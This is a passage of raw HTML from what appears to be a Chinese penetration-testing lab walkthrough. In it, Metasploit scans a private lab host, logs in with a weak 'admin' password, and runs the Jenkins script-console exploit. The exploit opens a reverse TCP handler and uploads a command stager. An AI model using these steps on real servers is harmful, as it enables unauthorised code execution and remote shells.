class=\"hljs-string\">========<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"4\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"5\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">host<\/span> <span class=\"hljs-string\">port<\/span> <span class=\"hljs-string\">proto<\/span> <span class=\"hljs-string\">name<\/span> <span class=\"hljs-string\">state<\/span> <span class=\"hljs-string\">info<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"6\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">----<\/span> <span class=\"hljs-string\">----<\/span> <span class=\"hljs-string\">-----<\/span> <span class=\"hljs-string\">----<\/span> <span class=\"hljs-string\">-----<\/span> <span class=\"hljs-string\">----<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"7\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.144<\/span> <span class=\"hljs-number\">8020 <\/span><span class=\"hljs-string\">tcp<\/span> <span class=\"hljs-string\">http<\/span> <span class=\"hljs-string\">open<\/span> <span class=\"hljs-string\">Apache<\/span> <span class=\"hljs-string\">httpd<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"8\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"9\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">msf5<\/span> <span class=\"hljs-string\">&gt;<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"10\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"copy-code-btn\"><span class=\"hljs-string\">\u590d\u5236\u4ee3\u7801<\/span><\/span><\/div>\n<\/div>\n<\/li>\n<\/ol>\n<pre><code class=\"hljs linux copyable yaml\"><\/code><\/pre>\n<p>\u8bbf\u95ee\u76ee\u6807\u7ad9\u70b9<\/p>\n<figure><figcaption><\/figcaption><\/figure>\n<p>\u901a\u8fc7\u6d4f\u89c8\u76ee\u6807\u7ad9\u70b9\uff0c\u6211\u4eec\u53ef\u4ee5\u5c1d\u8bd5\u4f7f\u7528\u5f31\u53e3\u4ee4\u8fdb\u884c\u767b\u5f55\uff0c\u6bd4\u5982\u00a0<code>admin<\/code><\/p>\n<figure><figcaption><\/figcaption><\/figure>\n<p>\u5c45\u7136\u767b\u5f55\u8fdb\u53bb\u4e86\u3002<\/p>\n<h5 class=\"heading\">\u600e\u4e48\u505a<\/h5>\n<p>1\u3001\u67e5\u770b\u8fd0\u884c\u5728\u00a0<code>8484<\/code>\u7aef\u53e3\u7684\u00a0<code>Jenkins-CI<\/code>\u670d\u52a1\u3002<\/p>\n<pre><code class=\"hljs linux copyable yaml\"><\/code><\/pre>\n<ol class=\"hljs-ln\">\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"1\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">msf5<\/span> <span class=\"hljs-string\">&gt;<\/span> <span class=\"hljs-string\">services<\/span> <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.144<\/span> <span class=\"hljs-string\">-p<\/span> <span class=\"hljs-number\">8484<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"2\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">Services<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"3\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">========<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"4\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"5\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">host<\/span> <span class=\"hljs-string\">port<\/span> <span class=\"hljs-string\">proto<\/span> <span class=\"hljs-string\">name<\/span> <span class=\"hljs-string\">state<\/span> <span class=\"hljs-string\">info<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"6\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">----<\/span> <span class=\"hljs-string\">----<\/span> <span class=\"hljs-string\">-----<\/span> <span class=\"hljs-string\">----<\/span> <span class=\"hljs-string\">-----<\/span> <span class=\"hljs-string\">----<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"7\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.144<\/span> <span class=\"hljs-number\">8484 <\/span><span class=\"hljs-string\">tcp<\/span> <span class=\"hljs-string\">http<\/span> <span class=\"hljs-string\">open<\/span> <span class=\"hljs-string\">Jetty<\/span> <span class=\"hljs-string\">winstone-2.8<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"8\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"copy-code-btn\"><span class=\"hljs-string\">\u590d\u5236\u4ee3\u7801<\/span><\/span><\/div>\n<\/div>\n<\/li>\n<\/ol>\n<pre><code class=\"hljs linux copyable yaml\"><\/code><\/pre>\n<p>\u8fd9\u91cc\uff0c\u5e76\u6ca1\u6709\u663e\u793a\u00a0<code>Jenkins<\/code>\uff0c\u6d4f\u89c8\u5668\u8bbf\u95ee\u770b\u770b<\/p>\n<figure><figcaption><\/figcaption><\/figure>\n<p>\u786e\u5b9e\u662f\u4e00\u4e2a\u00a0<code>Jenkins<\/code>\u670d\u52a1<\/p>\n<p>\u6211\u4eec\u4f7f\u7528<code>search jenkins<\/code>\u641c\u7d22\u53ef\u5229\u7528\u7684\u6a21\u5757<\/p>\n<pre><code class=\"hljs linux copyable yaml\"><\/code><\/pre>\n<ol class=\"hljs-ln\">\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"1\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">msf5<\/span> <span class=\"hljs-string\">&gt;<\/span> <span class=\"hljs-string\">search<\/span> <span class=\"hljs-string\">jenkins<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"2\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">Matching<\/span> <span class=\"hljs-string\">Modules<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"3\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">================<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"4\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"5\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-comment\"># Name Disclosure Date Rank Check Description <\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"6\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-bullet\">-<\/span> <span class=\"hljs-string\">----<\/span> <span class=\"hljs-string\">---------------<\/span> <span class=\"hljs-string\">----<\/span> <span class=\"hljs-string\">-----<\/span> <span class=\"hljs-string\">-----------<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"7\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-number\">1<\/span> <span class=\"hljs-string\">auxiliary\/gather\/jenkins_cred_recovery<\/span> <span class=\"hljs-string\">normal<\/span> <span class=\"hljs-literal\">Yes<\/span> <span class=\"hljs-string\">Jenkins<\/span> <span class=\"hljs-string\">Domain<\/span> <span class=\"hljs-string\">Credential<\/span> <span class=\"hljs-string\">Recovery<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"8\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-number\">2<\/span> <span class=\"hljs-string\">auxiliary\/scanner\/http\/jenkins_command<\/span> <span class=\"hljs-string\">normal<\/span> <span class=\"hljs-literal\">Yes<\/span> <span class=\"hljs-string\">Jenkins-CI<\/span> <span class=\"hljs-string\">Unauthenticated<\/span> <span class=\"hljs-string\">Script-Console<\/span> <span class=\"hljs-string\">Scanner<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"9\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-number\">3<\/span> <span class=\"hljs-string\">auxiliary\/scanner\/http\/jenkins_enum<\/span> <span class=\"hljs-string\">normal<\/span> <span class=\"hljs-literal\">Yes<\/span> <span class=\"hljs-string\">Jenkins-CI<\/span> <span class=\"hljs-string\">Enumeration<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"10\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-number\">4<\/span> <span class=\"hljs-string\">auxiliary\/scanner\/http\/jenkins_login<\/span> <span class=\"hljs-string\">normal<\/span> <span class=\"hljs-literal\">Yes<\/span> <span class=\"hljs-string\">Jenkins-CI<\/span> <span class=\"hljs-string\">Login<\/span> <span class=\"hljs-string\">Utility<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"11\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-number\">5<\/span> <span class=\"hljs-string\">auxiliary\/scanner\/jenkins\/jenkins_udp_broadcast_enum<\/span> <span class=\"hljs-string\">normal<\/span> <span class=\"hljs-literal\">No<\/span> <span class=\"hljs-string\">Jenkins<\/span> <span class=\"hljs-string\">Server<\/span> <span class=\"hljs-string\">Broadcast<\/span> <span class=\"hljs-string\">Enumeration<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"12\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-number\">6<\/span> <span class=\"hljs-string\">exploit\/linux\/misc\/jenkins_java_deserialize<\/span> <span class=\"hljs-number\">2015-11-18 <\/span><span class=\"hljs-string\">excellent<\/span> <span class=\"hljs-literal\">Yes<\/span> <span class=\"hljs-string\">Jenkins<\/span> <span class=\"hljs-string\">CLI<\/span> <span class=\"hljs-string\">RMI<\/span> <span class=\"hljs-string\">Java<\/span> <span class=\"hljs-string\">Deserialization<\/span> <span class=\"hljs-string\">Vulnerability<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"13\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-number\">7<\/span> <span class=\"hljs-string\">exploit\/linux\/misc\/jenkins_ldap_deserialize<\/span> <span class=\"hljs-number\">2016-11-16 <\/span><span class=\"hljs-string\">excellent<\/span> <span class=\"hljs-literal\">Yes<\/span> <span class=\"hljs-string\">Jenkins<\/span> <span class=\"hljs-string\">CLI<\/span> <span class=\"hljs-string\">HTTP<\/span> <span class=\"hljs-string\">Java<\/span> <span class=\"hljs-string\">Deserialization<\/span> <span class=\"hljs-string\">Vulnerability<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"14\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-number\">8<\/span> <span class=\"hljs-string\">exploit\/linux\/misc\/opennms_java_serialize<\/span> <span class=\"hljs-number\">2015-11-06 <\/span><span class=\"hljs-string\">normal<\/span> <span class=\"hljs-literal\">No<\/span> <span class=\"hljs-string\">OpenNMS<\/span> <span class=\"hljs-string\">Java<\/span> <span class=\"hljs-string\">Object<\/span> <span class=\"hljs-string\">Unserialization<\/span> <span class=\"hljs-string\">Remote<\/span> <span class=\"hljs-string\">Code<\/span> <span class=\"hljs-string\">Execution<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"15\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-number\">9<\/span> <span class=\"hljs-string\">exploit\/multi\/http\/jenkins_metaprogramming<\/span> <span class=\"hljs-number\">2019-01-08 <\/span><span class=\"hljs-string\">excellent<\/span> <span class=\"hljs-literal\">Yes<\/span> <span class=\"hljs-string\">Jenkins<\/span> <span class=\"hljs-string\">ACL<\/span> <span class=\"hljs-string\">Bypass<\/span> <span class=\"hljs-string\">and<\/span> <span class=\"hljs-string\">Metaprogramming<\/span> <span class=\"hljs-string\">RCE<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"16\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-number\">10<\/span> <span class=\"hljs-string\">exploit\/multi\/http\/jenkins_script_console<\/span> <span class=\"hljs-number\">2013-01-18 <\/span><span class=\"hljs-string\">good<\/span> <span class=\"hljs-literal\">Yes<\/span> <span class=\"hljs-string\">Jenkins-CI<\/span> <span class=\"hljs-string\">Script-Console<\/span> <span class=\"hljs-string\">Java<\/span> <span class=\"hljs-string\">Execution<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"17\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-number\">11<\/span> <span class=\"hljs-string\">exploit\/multi\/http\/jenkins_xstream_deserialize<\/span> <span class=\"hljs-number\">2016-02-24 <\/span><span class=\"hljs-string\">excellent<\/span> <span class=\"hljs-literal\">Yes<\/span> <span class=\"hljs-string\">Jenkins<\/span> <span class=\"hljs-string\">XStream<\/span> <span class=\"hljs-string\">Groovy<\/span> <span class=\"hljs-string\">classpath<\/span> <span class=\"hljs-string\">Deserialization<\/span> <span class=\"hljs-string\">Vulnerability<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"18\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-number\">12<\/span> <span class=\"hljs-string\">exploit\/windows\/misc\/ibm_websphere_java_deserialize<\/span> <span class=\"hljs-number\">2015-11-06 <\/span><span class=\"hljs-string\">excellent<\/span> <span class=\"hljs-literal\">No<\/span> <span class=\"hljs-string\">IBM<\/span> <span class=\"hljs-string\">WebSphere<\/span> <span class=\"hljs-string\">RCE<\/span> <span class=\"hljs-string\">Java<\/span> <span class=\"hljs-string\">Deserialization<\/span> <span class=\"hljs-string\">Vulnerability<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"19\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-number\">13<\/span> <span class=\"hljs-string\">post\/multi\/gather\/jenkins_gather<\/span> <span class=\"hljs-string\">normal<\/span> <span class=\"hljs-literal\">No<\/span> <span class=\"hljs-string\">Jenkins<\/span> <span class=\"hljs-string\">Credential<\/span> <span class=\"hljs-string\">Collector<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"20\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">msf5<\/span> <span class=\"hljs-string\">&gt;<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"21\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"copy-code-btn\"><span class=\"hljs-string\">\u590d\u5236\u4ee3\u7801<\/span><\/span><\/div>\n<\/div>\n<\/li>\n<\/ol>\n<pre><code class=\"hljs linux copyable yaml\"><\/code><\/pre>\n<p>\u4f7f\u7528<code>Jenkins-CI Script-Console Java Execution<\/code>\u6a21\u5757<\/p>\n<pre><code class=\"hljs linux copyable yaml\"><\/code><\/pre>\n<ol class=\"hljs-ln\">\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"1\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">msf5<\/span> <span class=\"hljs-string\">&gt;<\/span> <span class=\"hljs-string\">use<\/span> <span class=\"hljs-string\">exploit\/multi\/http\/jenkins_script_console<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"2\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">msf5<\/span> <span class=\"hljs-string\">exploit(multi\/http\/jenkins_script_console)<\/span> <span class=\"hljs-string\">&gt;<\/span> <span class=\"hljs-string\">set<\/span> <span class=\"hljs-string\">RHOSTS<\/span> <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.144<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"3\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">RHOSTS<\/span> <span class=\"hljs-string\">=&gt;<\/span> <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.144<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"4\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">msf5<\/span> <span class=\"hljs-string\">exploit(multi\/http\/jenkins_script_console)<\/span> <span class=\"hljs-string\">&gt;<\/span> <span class=\"hljs-string\">set<\/span> <span class=\"hljs-string\">RPORT<\/span> <span class=\"hljs-number\">8484<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"5\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">RPORT<\/span> <span class=\"hljs-string\">=&gt;<\/span> <span class=\"hljs-number\">8484<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"6\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">msf5<\/span> <span class=\"hljs-string\">exploit(multi\/http\/jenkins_script_console)<\/span> <span class=\"hljs-string\">&gt;<\/span> <span class=\"hljs-string\">set<\/span> <span class=\"hljs-string\">TARGETURI<\/span> <span class=\"hljs-string\">\/<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"7\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">TARGETURI<\/span> <span class=\"hljs-string\">=&gt;<\/span> <span class=\"hljs-string\">\/<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"8\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">msf5<\/span> <span class=\"hljs-string\">exploit(multi\/http\/jenkins_script_console)<\/span> <span class=\"hljs-string\">&gt;<\/span> <span class=\"hljs-string\">exploit<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"9\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"10\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[<span class=\"hljs-string\">*<\/span>] <span class=\"hljs-string\">Started<\/span> <span class=\"hljs-string\">reverse<\/span> <span class=\"hljs-string\">TCP<\/span> <span class=\"hljs-string\">handler<\/span> <span class=\"hljs-string\">on<\/span> <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.143<\/span><span class=\"hljs-string\">:4444<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"11\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[<span class=\"hljs-string\">*<\/span>] <span class=\"hljs-string\">Checking<\/span> <span class=\"hljs-string\">access<\/span> <span class=\"hljs-string\">to<\/span> <span class=\"hljs-string\">the<\/span> <span class=\"hljs-string\">script<\/span> <span class=\"hljs-string\">console<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"12\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[<span class=\"hljs-string\">*<\/span>] <span class=\"hljs-literal\">No<\/span> <span class=\"hljs-string\">authentication<\/span> <span class=\"hljs-string\">required,<\/span> <span class=\"hljs-string\">skipping<\/span> <span class=\"hljs-string\">login...<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"13\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[<span class=\"hljs-string\">*<\/span>] <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.144<\/span><span class=\"hljs-string\">:8484<\/span> <span class=\"hljs-bullet\">-<\/span> <span class=\"hljs-string\">Sending<\/span> <span class=\"hljs-string\">command<\/span> <span class=\"hljs-string\">stager...<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"14\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[<span class=\"hljs-string\">*<\/span>] <span class=\"hljs-string\">Command<\/span> <span class=\"hljs-string\">Stager<\/span> <span class=\"hljs-string\">progress<\/span> <span class=\"hljs-bullet\">-<\/span> <span class=\"hljs-number\">2.06<\/span><span class=\"hljs-string\">%<\/span> <span class=\"hljs-string\">done<\/span> <span class=\"hljs-string\">(2048\/99626<\/span> <span class=\"hljs-string\">bytes)<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"15\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[<span class=\"hljs-string\">*<\/span>] <span class=\"hljs-string\">Command<\/span> <span class=\"hljs-string\">Stager<\/span> <span class=\"hljs-string\">progress<\/span> <span class=\"hljs-bullet\">-<\/span> <span class=\"hljs-number\">4.11<\/span><span class=\"hljs-string\">%<\/span> <span class=\"hljs-string\">done<\/span> <span class=\"hljs-string\">(4096\/99626<\/span> <span class=\"hljs-string\">bytes)<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"16\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[<span class=\"hljs-string\">*<\/span>] <span class=\"hljs-string\">Command<\/span> <span class=\"hljs-string\">Stager<\/span> <span class=\"hljs-string\">progress<\/span> <span class=\"hljs-bullet\">-<\/span> <span class=\"hljs-number\">6.17<\/span><span class=\"hljs-string\">%<\/span> <span class=\"hljs-string\">done<\/span> <span class=\"hljs-string\">(6144\/99626<\/span> <span class=\"hljs-string\">bytes)<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"17\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">....<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"18\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[<span class=\"hljs-string\">*<\/span>] <span class=\"hljs-string\">Command<\/span> <span class=\"hljs-string\">Stager<\/span> <span class=\"hljs-string\">progress<\/span> <span class=\"hljs-bullet\">-<\/span> <span class=\"hljs-number\">98.67<\/span><span class=\"hljs-string\">%<\/span> <span class=\"hljs-string\">done<\/span> <span class=\"hljs-string\">(98304\/99626<\/span> <span class=\"hljs-string\">bytes)<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"19\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[<span class=\"hljs-string\">*<\/span>] <span class=\"hljs-string\">Command<\/span> <span class=\"hljs-string\">Stager<\/span> <span 